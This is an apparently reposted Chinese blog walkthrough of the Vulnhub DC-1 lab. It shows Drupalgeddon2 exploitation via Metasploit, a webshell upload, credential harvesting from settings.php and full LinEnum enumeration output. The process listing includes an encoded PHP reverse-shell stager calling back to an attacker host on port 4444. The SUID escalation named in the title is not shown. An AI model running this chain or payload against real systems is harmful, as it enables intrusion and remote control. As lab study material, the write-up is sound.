vunlhub-DC-1-LinuxSuid提权

最新推荐文章于 2022-07-12 15:18:50 发布
最新推荐文章于 2022-07-12 15:18:50 发布
阅读量2.8k 收藏
点赞数
文章标签: php shell 运维
原文链接:http://www.cnblogs.com/test404/p/10822810.html
版权

 

 

 

 

将靶场搭建起来 桥接看不到IP 于是用masscan 进行C段扫描 试试80 8080 

 

访问之后发现是个drupal

 掏出msf搜索一波

使用最近年限的exp尝试

 exploit/unix/webapp/drupal_drupalgeddon2

攻击成功 返回meterpreter的shell

 进行简单的信息收集

发现并不是root权限 ,想办法进行提权,首先执行常用的Linux提权检查工具

./Linux_Exploit_Suggester.pl

并没有返回可用的提权建议 于是用searchsploit 3.2.0尝试

表红框的exp.c编译并没有成功 提权失败

 上菜刀方便查看文件 shell.php

尝试去进行Linux -udf提权 

然后想的是用菜刀翻看连接数据库的账户看是否是高权限

/var/www/sites/default/settings.php

发现账号密码 但估计不是高权限

连接尝试

并不是root高权限

然后用Linux 提权检查工具LinEnum.sh 查看弱点

   1 [00;31m#########################################################[00m
   2 [00;31m#[00m [00;33mLocal Linux Enumeration & Privilege Escalation Script[00m [00;31m#[00m
   3 [00;31m#########################################################[00m
   4 [00;33m# www.rebootuser.com[00m
   5 [00;33m# version 0.95[00m
   6 
   7 [-] Debug Info
   8 [00;33m[+] Thorough tests = Disabled[00m
   9 
  10 
  11 [00;33mScan started at:
  12 Tue May  7 01:08:48 AEST 2019
  13 [00m
  14 
  15 [00;33m### SYSTEM ##############################################[00m
  16 [00;31m[-] Kernel information:[00m
  17 Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux
  18 
  19 
  20 [00;31m[-] Kernel information (continued):[00m
  21 Linux version 3.2.0-6-486 (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10+deb7u1) ) #1 Debian 3.2.102-1
  22 
  23 
  24 [00;31m[-] Specific release information:[00m
  25 PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"
  26 NAME="Debian GNU/Linux"
  27 VERSION_ID="7"
  28 VERSION="7 (wheezy)"
  29 ID=debian
  30 ANSI_COLOR="1;31"
  31 HOME_URL="http://www.debian.org/"
  32 SUPPORT_URL="http://www.debian.org/support/"
  33 BUG_REPORT_URL="http://bugs.debian.org/"
  34 
  35 
  36 [00;31m[-] Hostname:[00m
  37 DC-1
  38 
  39 
  40 [00;33m### USER/GROUP ##########################################[00m
  41 [00;31m[-] Current user/group info:[00m
  42 uid=33(www-data) gid=33(www-data) groups=33(www-data)
  43 
  44 
  45 [00;31m[-] Users that have previously logged onto the system:[00m
  46 Username         Port     From             Latest
  47 root             tty1                      Thu Feb 28 12:10:51 +1000 2019
  48 
  49 
  50 [00;31m[-] Who else is logged on:[00m
  51  01:08:48 up  1:00,  0 users,  load average: 0.00, 0.00, 0.00
  52 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
  53 
  54 
  55 [00;31m[-] Group memberships:[00m
  56 uid=0(root) gid=0(root) groups=0(root)
  57 uid=1(daemon) gid=1(daemon) groups=1(daemon)
  58 uid=2(bin) gid=2(bin) groups=2(bin)
  59 uid=3(sys) gid=3(sys) groups=3(sys)
  60 uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
  61 uid=5(games) gid=60(games) groups=60(games)
  62 uid=6(man) gid=12(man) groups=12(man)
  63 uid=7(lp) gid=7(lp) groups=7(lp)
  64 uid=8(mail) gid=8(mail) groups=8(mail)
  65 uid=9(news) gid=9(news) groups=9(news)
  66 uid=10(uucp) gid=10(uucp) groups=10(uucp)
  67 uid=13(proxy) gid=13(proxy) groups=13(proxy)
  68 uid=33(www-data) gid=33(www-data) groups=33(www-data)
  69 uid=34(backup) gid=34(backup) groups=34(backup)
  70 uid=38(list) gid=38(list) groups=38(list)
  71 uid=39(irc) gid=39(irc) groups=39(irc)
  72 uid=41(gnats) gid=41(gnats) groups=41(gnats)
  73 uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
  74 uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
  75 uid=101(Debian-exim) gid=104(Debian-exim) groups=104(Debian-exim)
  76 uid=102(statd) gid=65534(nogroup) groups=65534(nogroup)
  77 uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
  78 uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)
  79 uid=105(mysql) gid=109(mysql) groups=109(mysql)
  80 uid=1001(flag4) gid=1001(flag4) groups=1001(flag4)
  81 
  82 
  83 [00;31m[-] Contents of /etc/passwd:[00m
  84 root:x:0:0:root:/root:/bin/bash
  85 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  86 bin:x:2:2:bin:/bin:/bin/sh
  87 sys:x:3:3:sys:/dev:/bin/sh
  88 sync:x:4:65534:sync:/bin:/bin/sync
  89 games:x:5:60:games:/usr/games:/bin/sh
  90 man:x:6:12:man:/var/cache/man:/bin/sh
  91 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  92 mail:x:8:8:mail:/var/mail:/bin/sh
  93 news:x:9:9:news:/var/spool/news:/bin/sh
  94 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  95 proxy:x:13:13:proxy:/bin:/bin/sh
  96 www-data:x:33:33:www-data:/var/www:/bin/sh
  97 backup:x:34:34:backup:/var/backups:/bin/sh
  98 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
  99 irc:x:39:39:ircd:/var/run/ircd:/bin/sh
 100 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
 101 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
 102 libuuid:x:100:101::/var/lib/libuuid:/bin/sh
 103 Debian-exim:x:101:104::/var/spool/exim4:/bin/false
 104 statd:x:102:65534::/var/lib/nfs:/bin/false
 105 messagebus:x:103:107::/var/run/dbus:/bin/false
 106 sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
 107 mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
 108 flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
 109 
 110 
 111 [00;31m[-] Super user account(s):[00m
 112 root
 113 
 114 
 115 [00;31m[-] Are permissions on /home directories lax:[00m
 116 total 12K
 117 drwxr-xr-x  3 root  root  4.0K Feb 19 23:51 .
 118 drwxr-xr-x 23 root  root  4.0K Feb 19 22:34 ..
 119 drwxr-xr-x  2 flag4 flag4 4.0K Feb 19 23:28 flag4
 120 
 121 
 122 [00;31m[-] Root is allowed to login via SSH:[00m
 123 PermitRootLogin yes
 124 
 125 
 126 [00;33m### ENVIRONMENTAL #######################################[00m
 127 [00;31m[-] Environment information:[00m
 128 APACHE_PID_FILE=/var/run/apache2.pid
 129 APACHE_RUN_USER=www-data
 130 APACHE_LOG_DIR=/var/log/apache2
 131 PATH=/usr/local/bin:/usr/bin:/bin
 132 PWD=/var/www
 133 APACHE_RUN_GROUP=www-data
 134 LANG=C
 135 SHLVL=1
 136 APACHE_LOCK_DIR=/var/lock/apache2
 137 APACHE_RUN_DIR=/var/run/apache2
 138 _=/usr/bin/env
 139 
 140 
 141 [00;31m[-] Path information:[00m
 142 /usr/local/bin:/usr/bin:/bin
 143 
 144 
 145 [00;31m[-] Available shells:[00m
 146 # /etc/shells: valid login shells
 147 /bin/sh
 148 /bin/dash
 149 /bin/bash
 150 /bin/rbash
 151 
 152 
 153 [00;31m[-] Current umask value:[00m
 154 0022
 155 u=rwx,g=rx,o=rx
 156 
 157 
 158 [00;31m[-] umask value as specified in /etc/login.defs:[00m
 159 UMASK        022
 160 
 161 
 162 [00;31m[-] Password and storage information:[00m
 163 PASS_MAX_DAYS    99999
 164 PASS_MIN_DAYS    0
 165 PASS_WARN_AGE    7
 166 ENCRYPT_METHOD SHA512
 167 
 168 
 169 [00;33m### JOBS/TASKS ##########################################[00m
 170 [00;31m[-] Cron jobs:[00m
 171 -rw-r--r-- 1 root root  722 Jul  4  2012 /etc/crontab
 172 
 173 /etc/cron.d:
 174 total 16
 175 drwxr-xr-x  2 root root 4096 Feb 19 23:01 .
 176 drwxr-xr-x 85 root root 4096 May  7 00:08 ..
 177 -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
 178 -rw-r--r--  1 root root  510 May 10  2018 php5
 179 
 180 /etc/cron.daily:
 181 total 68
 182 drwxr-xr-x  2 root root  4096 Feb 19 23:01 .
 183 drwxr-xr-x 85 root root  4096 May  7 00:08 ..
 184 -rw-r--r--  1 root root   102 Jul  4  2012 .placeholder
 185 -rwxr-xr-x  1 root root   633 May 30  2018 apache2
 186 -rwxr-xr-x  1 root root 14985 Oct 24  2014 apt
 187 -rwxr-xr-x  1 root root   314 Nov  5  2012 aptitude
 188 -rwxr-xr-x  1 root root   355 Jun 11  2012 bsdmainutils
 189 -rwxr-xr-x  1 root root   256 May  3  2016 dpkg
 190 -rwxr-xr-x  1 root root  4125 Feb 11  2018 exim4-base
 191 -rwxr-xr-x  1 root root    89 May 17  2012 logrotate
 192 -rwxr-xr-x  1 root root  1365 Jun 19  2012 man-db
 193 -rwxr-xr-x  1 root root   606 Sep 25  2010 mlocate
 194 -rwxr-xr-x  1 root root   249 May 26  2012 passwd
 195 
 196 /etc/cron.hourly:
 197 total 12
 198 drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
 199 drwxr-xr-x 85 root root 4096 May  7 00:08 ..
 200 -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
 201 
 202 /etc/cron.monthly:
 203 total 12
 204 drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
 205 drwxr-xr-x 85 root root 4096 May  7 00:08 ..
 206 -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
 207 
 208 /etc/cron.weekly:
 209 total 16
 210 drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
 211 drwxr-xr-x 85 root root 4096 May  7 00:08 ..
 212 -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
 213 -rwxr-xr-x  1 root root  907 Jun 19  2012 man-db
 214 
 215 
 216 [00;31m[-] Crontab contents:[00m
 217 # /etc/crontab: system-wide crontab
 218 # Unlike any other crontab you don't have to run the `crontab'
 219 # command to install the new version when you edit this file
 220 # and files in /etc/cron.d. These files also have username fields,
 221 # that none of the other crontabs do.
 222 
 223 SHELL=/bin/sh
 224 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
 225 
 226 # m h dom mon dow user    command
 227 17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
 228 25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
 229 47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
 230 52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
 231 #
 232 
 233 
 234 [00;33m### NETWORKING  ##########################################[00m
 235 [00;31m[-] Network and IP info:[00m
 236 eth0      Link encap:Ethernet  HWaddr 00:0c:29:d1:f4:98  
 237           inet addr:192.168.16.107  Bcast:192.168.16.255  Mask:255.255.255.0
 238           inet6 addr: fe80::20c:29ff:fed1:f498/64 Scope:Link
 239           UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
 240           RX packets:8702 errors:0 dropped:0 overruns:0 frame:0
 241           TX packets:3009 errors:0 dropped:0 overruns:0 carrier:0
 242           collisions:0 txqueuelen:1000 
 243           RX bytes:1325354 (1.2 MiB)  TX bytes:1103771 (1.0 MiB)
 244 
 245 lo        Link encap:Local Loopback  
 246           inet addr:127.0.0.1  Mask:255.0.0.0
 247           inet6 addr: ::1/128 Scope:Host
 248           UP LOOPBACK RUNNING  MTU:16436  Metric:1
 249           RX packets:50 errors:0 dropped:0 overruns:0 frame:0
 250           TX packets:50 errors:0 dropped:0 overruns:0 carrier:0
 251           collisions:0 txqueuelen:0 
 252           RX bytes:4852 (4.7 KiB)  TX bytes:4852 (4.7 KiB)
 253 
 254 
 255 [00;31m[-] ARP history:[00m
 256 192.168.16.254 dev eth0 lladdr 00:22:aa:d0:dd:95 REACHABLE
 257 192.168.16.112 dev eth0 lladdr f0:18:98:6b:ed:5b REACHABLE
 258 
 259 
 260 [00;31m[-] Nameserver(s):[00m
 261 nameserver 192.168.16.254
 262 nameserver 0.0.0.0
 263 
 264 
 265 [00;31m[-] Default route:[00m
 266 default via 192.168.16.254 dev eth0 
 267 
 268 
 269 [00;31m[-] Listening TCP:[00m
 270 Active Internet connections (servers and established)
 271 Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
 272 tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
 273 tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -               
 274 tcp        0      0 0.0.0.0:40858           0.0.0.0:*               LISTEN      -               
 275 tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
 276 tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -               
 277 tcp        0    480 192.168.16.107:33469    192.168.16.112:4444     ESTABLISHED 3406/php        
 278 tcp6       0      0 :::22                   :::*                    LISTEN      -               
 279 tcp6       0      0 ::1:25                  :::*                    LISTEN      -               
 280 tcp6       0      0 :::34190                :::*                    LISTEN      -               
 281 tcp6       0      0 :::111                  :::*                    LISTEN      -               
 282 tcp6       0      0 :::80                   :::*                    LISTEN      -               
 283 tcp6       0      0 192.168.16.107:80       192.168.16.112:52090    TIME_WAIT   -               
 284 tcp6       1      0 192.168.16.107:80       192.168.16.112:63539    CLOSE_WAIT  -               
 285 
 286 
 287 [00;31m[-] Listening UDP:[00m
 288 Active Internet connections (servers and established)
 289 Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
 290 udp        0      0 0.0.0.0:59942           0.0.0.0:*                           -               
 291 udp        0      0 0.0.0.0:68              0.0.0.0:*                           -               
 292 udp        0      0 0.0.0.0:111             0.0.0.0:*                           -               
 293 udp        0      0 0.0.0.0:769             0.0.0.0:*                           -               
 294 udp        0      0 127.0.0.1:801           0.0.0.0:*                           -               
 295 udp        0      0 0.0.0.0:21881           0.0.0.0:*                           -               
 296 udp6       0      0 :::52815                :::*                                -               
 297 udp6       0      0 :::28256                :::*                                -               
 298 udp6       0      0 :::111                  :::*                                -               
 299 udp6       0      0 :::769                  :::*                                -               
 300 
 301 
 302 [00;33m### SERVICES #############################################[00m
 303 [00;31m[-] Running processes:[00m
 304 USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
 305 root         1  0.0  0.0   2296   780 ?        Ss   00:08   0:01 init [2]  
 306 root         2  0.0  0.0      0     0 ?        S    00:08   0:00 [kthreadd]
 307 root         3  0.0  0.0      0     0 ?        S    00:08   0:00 [ksoftirqd/0]
 308 root         4  0.0  0.0      0     0 ?        S    00:08   0:00 [kworker/0:0]
 309 root         6  0.0  0.0      0     0 ?        S    00:08   0:00 [watchdog/0]
 310 root         7  0.0  0.0      0     0 ?        S<   00:08   0:00 [cpuset]
 311 root         8  0.0  0.0      0     0 ?        S<   00:08   0:00 [khelper]
 312 root         9  0.0  0.0      0     0 ?        S    00:08   0:00 [kdevtmpfs]
 313 root        10  0.0  0.0      0     0 ?        S<   00:08   0:00 [netns]
 314 root        11  0.0  0.0      0     0 ?        S    00:08   0:00 [sync_supers]
 315 root        12  0.0  0.0      0     0 ?        S    00:08   0:00 [bdi-default]
 316 root        13  0.0  0.0      0     0 ?        S<   00:08   0:00 [kintegrityd]
 317 root        14  0.0  0.0      0     0 ?        S<   00:08   0:00 [kblockd]
 318 root        15  0.0  0.0      0     0 ?        S    00:08   0:00 [khungtaskd]
 319 root        16  0.0  0.0      0     0 ?        S    00:08   0:00 [kswapd0]
 320 root        17  0.0  0.0      0     0 ?        SN   00:08   0:00 [ksmd]
 321 root        18  0.0  0.0      0     0 ?        S    00:08   0:00 [fsnotify_mark]
 322 root        19  0.0  0.0      0     0 ?        S<   00:08   0:00 [crypto]
 323 root        95  0.0  0.0      0     0 ?        S    00:08   0:00 [khubd]
 324 root       105  0.0  0.0      0     0 ?        S<   00:08   0:00 [ata_sff]
 325 root       115  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_0]
 326 root       125  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_1]
 327 root       134  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_2]
 328 root       135  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_3]
 329 root       136  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_4]
 330 root       137  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_5]
 331 root       138  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_6]
 332 root       139  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_7]
 333 root       140  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_8]
 334 root       141  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_9]
 335 root       142  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_10]
 336 root       143  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_11]
 337 root       144  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_12]
 338 root       145  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_13]
 339 root       146  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_14]
 340 root       147  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_15]
 341 root       148  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_16]
 342 root       149  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_17]
 343 root       150  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_18]
 344 root       151  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_19]
 345 root       152  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_20]
 346 root       153  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_21]
 347 root       154  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_22]
 348 root       155  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_23]
 349 root       156  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_24]
 350 root       157  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_25]
 351 root       158  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_26]
 352 root       159  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_27]
 353 root       160  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_28]
 354 root       161  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_29]
 355 root       162  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_30]
 356 root       163  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_31]
 357 root       190  0.0  0.0      0     0 ?        S    00:08   0:00 [kworker/u:29]
 358 root       191  0.0  0.0      0     0 ?        S    00:08   0:00 [kworker/u:30]
 359 root       308  0.0  0.0      0     0 ?        S    00:08   0:00 [jbd2/sda1-8]
 360 root       309  0.0  0.0      0     0 ?        S<   00:08   0:00 [ext4-dio-unwrit]
 361 root       458  0.0  0.1   2688  1244 ?        Ss   00:08   0:00 udevd --daemon
 362 root       543  0.0  0.0      0     0 ?        S<   00:08   0:00 [ttm_swap]
 363 root       699  0.0  0.0      0     0 ?        S<   00:08   0:00 [kpsmoused]
 364 root      1866  0.0  0.0   2388   904 ?        Ss   00:08   0:00 /sbin/rpcbind -w
 365 statd     1897  0.0  0.1   2660  1280 ?        Ss   00:08   0:00 /sbin/rpc.statd
 366 root      1902  0.0  0.0   2684   888 ?        S    00:08   0:00 udevd --daemon
 367 root      1903  0.0  0.0      0     0 ?        S<   00:08   0:00 [rpciod]
 368 root      1905  0.0  0.0      0     0 ?        S<   00:08   0:00 [nfsiod]
 369 root      1912  0.0  0.0   2592   568 ?        Ss   00:08   0:00 /usr/sbin/rpc.idmapd
 370 root      2215  0.0  0.2  28352  2080 ?        Sl   00:08   0:00 /usr/sbin/rsyslogd -c5
 371 root      2267  0.0  0.0   1892   608 ?        Ss   00:08   0:00 /usr/sbin/acpid
 372 root      2303  0.0  0.8  43680  8928 ?        Ss   00:08   0:00 /usr/sbin/apache2 -k start
 373 daemon    2347  0.0  0.0   2168   316 ?        Ss   00:08   0:00 /usr/sbin/atd
 374 103       2353  0.0  0.0   3032   644 ?        Ss   00:08   0:00 /usr/bin/dbus-daemon --system
 375 www-data  2381  0.0  1.3  48448 14420 ?        S    00:08   0:00 /usr/sbin/apache2 -k start
 376 www-data  2382  0.0  1.2  47424 13408 ?        S    00:08   0:00 /usr/sbin/apache2 -k start
 377 www-data  2383  0.0  1.4  47676 14836 ?        S    00:08   0:01 /usr/sbin/apache2 -k start
 378 www-data  2384  0.0  1.1  46148 12080 ?        S    00:08   0:00 /usr/sbin/apache2 -k start
 379 root      2438  0.0  0.0   3852   988 ?        Ss   00:08   0:00 /usr/sbin/cron
 380 root      2493  0.0  0.0   1948   588 ?        S    00:08   0:00 /bin/sh /usr/bin/mysqld_safe
 381 mysql     2831  0.0  4.7 329380 49184 ?        Sl   00:08   0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
 382 root      2832  0.0  0.0   1868   604 ?        S    00:08   0:00 logger -t mysqld -p daemon.error
 383 101       3228  0.0  0.0   7424   992 ?        Ss   00:08   0:00 /usr/sbin/exim4 -bd -q30m
 384 root      3281  0.0  0.0   3796   840 tty2     Ss+  00:08   0:00 /sbin/getty 38400 tty2
 385 root      3282  0.0  0.0   3796   836 tty3     Ss+  00:08   0:00 /sbin/getty 38400 tty3
 386 root      3283  0.0  0.0   3796   840 tty4     Ss+  00:08   0:00 /sbin/getty 38400 tty4
 387 root      3284  0.0  0.0   3796   836 tty5     Ss+  00:08   0:00 /sbin/getty 38400 tty5
 388 root      3285  0.0  0.0   3796   840 tty6     Ss+  00:08   0:00 /sbin/getty 38400 tty6
 389 root      3287  0.0  0.0      0     0 ?        S    00:08   0:00 [flush-8:0]
 390 root      3298  0.0  0.2   5196  2320 ?        Ss   00:08   0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
 391 root      3339  0.0  0.1   6496  1076 ?        Ss   00:08   0:00 /usr/sbin/sshd
 392 root      3354  0.0  0.0   3796   840 tty1     Ss+  00:09   0:00 /sbin/getty 38400 tty1
 393 www-data  3358  0.0  1.5  49688 15620 ?        S    00:18   0:00 /usr/sbin/apache2 -k start
 394 www-data  3360  0.0  1.1  45892 11832 ?        S    00:18   0:00 /usr/sbin/apache2 -k start
 395 www-data  3361  0.0  1.6  51624 16812 ?        S    00:18   0:00 /usr/sbin/apache2 -k start
 396 www-data  3381  0.0  1.1  45892 11828 ?        S    00:32   0:00 /usr/sbin/apache2 -k start
 397 www-data  3385  0.0  1.2  47436 13392 ?        S    00:32   0:00 /usr/sbin/apache2 -k start
 398 www-data  3386  0.0  1.2  47416 13320 ?        S    00:32   0:00 /usr/sbin/apache2 -k start
 399 www-data  3405  0.0  0.0   1948   540 ?        S    00:39   0:00 sh -c php -r 'eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTYuMTEyJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNr.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));'
 400 www-data  3406  0.0  0.8  41132  9032 ?        S    00:39   0:01 php -r eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTYuMTEyJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNr.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));
 401 www-data  3408  0.0  0.0   1948   520 ?        S    00:40   0:00 sh -c /bin/sh 
 402 www-data  3409  0.0  0.0   1948   576 ?        S    00:40   0:00 /bin/sh
 403 root      3488  0.0  0.0      0     0 ?        S    01:01   0:00 [kworker/0:1]
 404 root      4393  0.0  0.0      0     0 ?        S    01:07   0:00 [kworker/0:2]
 405 www-data  4398  0.0  0.1   3500  1764 ?        S    01:08   0:00 /bin/bash ./LinEnum.sh
 406 www-data  4399  0.0  0.1   3552  1380 ?        S    01:08   0:00 /bin/bash ./LinEnum.sh
